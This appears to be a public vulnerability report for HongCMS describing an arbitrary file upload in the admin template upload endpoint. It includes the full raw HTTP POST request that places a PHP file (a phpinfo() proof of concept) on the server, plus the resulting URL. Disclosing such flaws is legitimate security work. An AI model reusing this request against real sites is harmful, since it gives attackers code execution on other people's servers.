HongCMS
HongCMS copied to clipboard
Published
20 hours ago •
Neeke
Neeke
Arbitrary File Upload Getshell
Steps To Reproduce: 1. Login to the backstage as the admin; 2. POST shell data via /hongcms/admin/index.php/template
POST /hongcms/admin/index.php/template/upload HTTP/1.1
Host: 192.168.0.193
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.193/hongcms/admin/index.php/template
Content-Type: multipart/form-data; boundary=---------------------------132861034225313
Content-Length: 341
Cookie: hibext_instdsigdipv2=1; _ga=GA1.1.265473964.1530252217; _gid=GA1.1.1034335256.1530252217; YmTry9y6Wf3Znews=1; YmTry9y6Wf3Zadmin=1adc8a472890f6070d13d2cc3d19fd8c; YmTry9y6Wf3Zproduct=5
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------132861034225313
Content-Disposition: form-data; name="dir"
-----------------------------132861034225313
Content-Disposition: form-data; name="file"; filename="only.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
-----------------------------132861034225313--
- shell is http://192.168.0.193/hongcms/public/templates/only.php
